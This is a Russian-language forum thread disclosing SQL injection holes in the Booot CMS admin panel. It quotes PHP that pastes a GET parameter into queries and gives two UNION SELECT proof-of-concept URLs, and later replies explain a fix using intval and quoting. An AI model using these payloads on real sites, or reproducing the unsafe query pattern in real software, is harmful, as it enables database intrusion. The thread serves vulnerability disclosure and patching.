Старый 21.10.2010, 21:17   #1
-PRIVAT-
 
Регистрация: 06.07.2010
Сообщений: 10
Репутация: 5
По умолчанию Уязвимости Booot CMS

Тип уязвимости: SQL inj
Зависимости: Права админа
Куски уязвимых кодов:
PHP код:
if(isset($_GET['top'])) {
            
$i $this->db->rows("SELECT * FROM `prefix_products_topics` WHERE `id` = ".$_GET['top']); 
PHP код:
if(!isset($_GET['top'])) {
....
$i $this->db->rows("SELECT * FROM `prefix_content` WHERE `id` = ".$_GET['top']); 
PHP код:
if(!isset($_GET['top'])) {
....
$i $this->db->rows("SELECT * FROM `prefix_content` WHERE `id` = ".$_GET['top']); 
Примеры:
host/admin/?module=Catalog&method=Info&top=-12 union select 1,2,3,version(),5,6,7,8,9,0,1,2,3,4,5,6,7,8--


host/admin/?module=Content&method=Info&top=-5 union select 1,2,3,4,version(),6,7,8,9,0,1,2,3--
Уязвима вся админка. Видимо разработчики решили, что баги в админке никому не нужны..
-PRIVAT- вне форума   Ответить с цитированием
Старый 27.01.2011, 11:38   #2
nomen
 
Аватар для nomen
 
Регистрация: 26.01.2011
Сообщений: 2
Репутация: 0
По умолчанию

Классно, спасибо.
Подскажите, чтобы исправить эту ситуацию, что нужно сделать?
Я так понимаю не достаточно будет обработать полученные параметры mysql_escape_string ?
nomen вне форума   Ответить с цитированием
Старый 27.01.2011, 11:41   #3
m0Hze
 
Аватар для m0Hze
 
Регистрация: 05.07.2010
Сообщений: 326
Репутация: 129
По умолчанию

Цитата:
Сообщение от nomen Посмотреть сообщение
Классно, спасибо.
Подскажите, чтобы исправить эту ситуацию, что нужно сделать?
Я так понимаю не достаточно будет обработать полученные параметры mysql_escape_string ?
Обрамить в запросе кавычками, и там же интвалить, select..where id='".intval($_GET[a])."'
Это конечно, если top должен быть числом, если строкой, то просто обрамляем в кавычки, и mysql_real..
__________________
multi-vpn.biz - Первый VPN на Эллиптических кривых со скоростью света.
m0Hze вне форума   Ответить с цитированием
Старый 27.01.2011, 11:45   #4
nomen
 
Аватар для nomen
 
Регистрация: 26.01.2011
Сообщений: 2
Репутация: 0
По умолчанию

Логично, спасибо.
nomen вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot